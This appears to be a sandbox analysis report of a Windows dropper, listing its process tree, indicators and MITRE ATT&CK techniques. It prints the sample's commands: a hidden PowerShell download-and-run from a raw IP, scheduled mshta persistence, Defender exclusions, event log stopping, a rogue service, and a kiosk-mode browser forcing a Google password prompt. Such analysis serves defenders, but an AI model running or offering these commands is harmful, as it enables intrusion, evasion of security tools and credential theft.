pid Process 2068 powershell.exe 2068 powershell.exe 2068 powershell.exe 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 700 rapes.exe 368 0974c9d1cc.exe 2060 d0e63d47c9.exe 2936 d45941d81b.exe 1388 35d7e2eba2.exe 2936 d45941d81b.exe 2936 d45941d81b.exe 2936 d45941d81b.exe 2936 d45941d81b.exe 1388 35d7e2eba2.exe 1388 35d7e2eba2.exe 1388 35d7e2eba2.exe 1388 35d7e2eba2.exe 2340 b799061492.exe 2148 baf41f08af.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2280 ceea5a1e0e.exe 2280 ceea5a1e0e.exe 2280 ceea5a1e0e.exe 1708 v6Oqdnc.exe 1708 v6Oqdnc.exe 3440 OEHBOHk.exe 3824 powershell.exe 3440 OEHBOHk.exe 3440 OEHBOHk.exe 3440 OEHBOHk.exe 3440 OEHBOHk.exe 3440 OEHBOHk.exe 3440 OEHBOHk.exe 3440 OEHBOHk.exe 3440 OEHBOHk.exe 3440 OEHBOHk.exe 3244 ckonftponqgz.exe 3216 powershell.exe 3244 ckonftponqgz.exe 3244 ckonftponqgz.exe 3244 ckonftponqgz.exe 3244 ckonftponqgz.exe 3244 ckonftponqgz.exe 3244 ckonftponqgz.exe 3244 ckonftponqgz.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 1388 4b99eca92e.exe Token: SeDebugPrivilege 2740 taskkill.exe Token: SeDebugPrivilege 2792 taskkill.exe Token: SeDebugPrivilege 1108 taskkill.exe Token: SeDebugPrivilege 1604 taskkill.exe Token: SeDebugPrivilege 2700 taskkill.exe Token: SeDebugPrivilege 2176 firefox.exe Token: SeDebugPrivilege 2176 firefox.exe Token: SeDebugPrivilege 2280 ceea5a1e0e.exe Token: SeDebugPrivilege 3824 powershell.exe Token: SeShutdownPrivilege 3928 powercfg.exe Token: SeShutdownPrivilege 3936 powercfg.exe Token: SeShutdownPrivilege 3944 powercfg.exe Token: SeShutdownPrivilege 3972 powercfg.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeShutdownPrivilege 2576 powercfg.exe Token: SeShutdownPrivilege 1948 powercfg.exe Token: SeShutdownPrivilege 3056 powercfg.exe Token: SeShutdownPrivilege 980 powercfg.exe Token: SeLockMemoryPrivilege 3236 explorer.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
pid Process 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2176 firefox.exe 2176 firefox.exe 2176 firefox.exe 2176 firefox.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe 2176 firefox.exe 2176 firefox.exe 2176 firefox.exe 2636 f4dcb32859.exe 2636 f4dcb32859.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2868 wrote to memory of 3032 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 30 PID 2868 wrote to memory of 3032 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 30 PID 2868 wrote to memory of 3032 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 30 PID 2868 wrote to memory of 3032 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 30 PID 2868 wrote to memory of 2788 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 31 PID 2868 wrote to memory of 2788 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 31 PID 2868 wrote to memory of 2788 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 31 PID 2868 wrote to memory of 2788 2868 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 31 PID 3032 wrote to memory of 2852 3032 cmd.exe 33 PID 3032 wrote to memory of 2852 3032 cmd.exe 33 PID 3032 wrote to memory of 2852 3032 cmd.exe 33 PID 3032 wrote to memory of 2852 3032 cmd.exe 33 PID 2788 wrote to memory of 2068 2788 mshta.exe 34 PID 2788 wrote to memory of 2068 2788 mshta.exe 34 PID 2788 wrote to memory of 2068 2788 mshta.exe 34 PID 2788 wrote to memory of 2068 2788 mshta.exe 34 PID 2068 wrote to memory of 2112 2068 powershell.exe 36 PID 2068 wrote to memory of 2112 2068 powershell.exe 36 PID 2068 wrote to memory of 2112 2068 powershell.exe 36 PID 2068 wrote to memory of 2112 2068 powershell.exe 36 PID 2112 wrote to memory of 700 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 37 PID 2112 wrote to memory of 700 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 37 PID 2112 wrote to memory of 700 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 37 PID 2112 wrote to memory of 700 2112 TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE 37 PID 700 wrote to memory of 368 700 rapes.exe 39 PID 700 wrote to memory of 368 700 rapes.exe 39 PID 700 wrote to memory of 368 700 rapes.exe 39 PID 700 wrote to memory of 368 700 rapes.exe 39 PID 700 wrote to memory of 1388 700 rapes.exe 40 PID 700 wrote to memory of 1388 700 rapes.exe 40 PID 700 wrote to memory of 1388 700 rapes.exe 40 PID 700 wrote to memory of 1388 700 rapes.exe 40 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 112 1388 4b99eca92e.exe 41 PID 1388 wrote to memory of 2084 1388 4b99eca92e.exe 42 PID 1388 wrote to memory of 2084 1388 4b99eca92e.exe 42 PID 1388 wrote to memory of 2084 1388 4b99eca92e.exe 42 PID 1388 wrote to memory of 2084 1388 4b99eca92e.exe 42 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 368 wrote to memory of 884 368 0974c9d1cc.exe 43 PID 112 wrote to memory of 1720 112 4b99eca92e.exe 45 PID 112 wrote to memory of 1720 112 4b99eca92e.exe 45 PID 112 wrote to memory of 1720 112 4b99eca92e.exe 45 PID 112 wrote to memory of 1720 112 4b99eca92e.exe 45 PID 700 wrote to memory of 2060 700 rapes.exe 47 PID 700 wrote to memory of 2060 700 rapes.exe 47 PID 700 wrote to memory of 2060 700 rapes.exe 47 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe"C:\Users\Admin\AppData\Local\Temp\6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn IYgybmaalE2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\yGFAOVNIS.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn IYgybmaalE2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\yGFAOVNIS.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2852
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\yGFAOVNIS.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Users\Admin\AppData\Local\TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE"C:\Users\Admin\AppData\Local\TempOOMUZQARSBNFT1ITDDWGP2QKL5BXGTRR.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Users\Admin\AppData\Local\Temp\10105540101\0974c9d1cc.exe"C:\Users\Admin\AppData\Local\Temp\10105540101\0974c9d1cc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105550101\4b99eca92e.exe"C:\Users\Admin\AppData\Local\Temp\10105550101\4b99eca92e.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\10105550101\4b99eca92e.exe"C:\Users\Admin\AppData\Local\Temp\10105550101\4b99eca92e.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 112 -s 10328⤵
- Loads dropped DLL
- Program crash
PID:1720
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1388 -s 5127⤵
- Loads dropped DLL
- Program crash
PID:2084
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105560101\d0e63d47c9.exe"C:\Users\Admin\AppData\Local\Temp\10105560101\d0e63d47c9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2060 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105570101\d45941d81b.exe"C:\Users\Admin\AppData\Local\Temp\10105570101\d45941d81b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2936
-
-
C:\Users\Admin\AppData\Local\Temp\10105580101\35d7e2eba2.exe"C:\Users\Admin\AppData\Local\Temp\10105580101\35d7e2eba2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1388
-
-
C:\Users\Admin\AppData\Local\Temp\10105590101\b799061492.exe"C:\Users\Admin\AppData\Local\Temp\10105590101\b799061492.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2340 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 12127⤵
- Loads dropped DLL
- Program crash
PID:2380
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105600101\baf41f08af.exe"C:\Users\Admin\AppData\Local\Temp\10105600101\baf41f08af.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2148
-
-
C:\Users\Admin\AppData\Local\Temp\10105610101\f4dcb32859.exe"C:\Users\Admin\AppData\Local\Temp\10105610101\f4dcb32859.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2636 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:928
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2176 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.0.870440171\239906035" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f98590d1-6dea-4f14-a697-4041d5dc1d0a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1280 101cd058 gpu9⤵PID:2900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.1.925290655\318065056" -parentBuildID 20221007134813 -prefsHandle 1472 -prefMapHandle 1468 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9a65428-1452-4676-b63c-727e24f9f17e} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1500 d74558 socket9⤵PID:2724
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.2.1590502267\47093695" -childID 1 -isForBrowser -prefsHandle 2028 -prefMapHandle 2044 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e915ac31-0d3e-4e79-adf4-12ae24178af1} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2020 19adbb58 tab9⤵PID:2516
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.3.562601285\341159552" -childID 2 -isForBrowser -prefsHandle 2852 -prefMapHandle 2848 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e09cbff6-9550-4c8c-a997-4cb7443f92c8} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2864 d64858 tab9⤵PID:900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.4.894274098\986878300" -childID 3 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d5a9802-14b8-4153-977f-e42b175c6c44} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3928 1fdd7458 tab9⤵PID:1940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.5.63519901\736010315" -childID 4 -isForBrowser -prefsHandle 4048 -prefMapHandle 4052 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54a29fe7-e9c1-4ff1-a11f-11673fb2169a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3892 200d7358 tab9⤵PID:112
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.6.1291563817\2097252303" -childID 5 -isForBrowser -prefsHandle 4240 -prefMapHandle 4244 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdc9c455-1321-4e34-83b5-619b0482cfd5} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 4332 20231858 tab9⤵PID:568
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105620101\ceea5a1e0e.exe"C:\Users\Admin\AppData\Local\Temp\10105620101\ceea5a1e0e.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Users\Admin\AppData\Local\Temp\10105630101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10105630101\v6Oqdnc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1708 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 12167⤵
- Loads dropped DLL
- Program crash
PID:3232
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105640101\OEHBOHk.exe"C:\Users\Admin\AppData\Local\Temp\10105640101\OEHBOHk.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3440 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:3920
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵
- Drops file in Windows directory
PID:4064
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3936
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "DWENDQPG"7⤵
- Launches sc.exe
PID:3980
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"7⤵
- Launches sc.exe
PID:4044
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:4084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "DWENDQPG"7⤵
- Launches sc.exe
PID:4092
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
PID:3596
-
-
C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
PID:3604
-
-
C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 10368⤵
- Loads dropped DLL
- Program crash
PID:3788
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 5207⤵
- Loads dropped DLL
- Program crash
PID:3668
-
-
-
-
-
-
-
C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exeC:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3244 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2272
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:3312
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2660
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
6Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
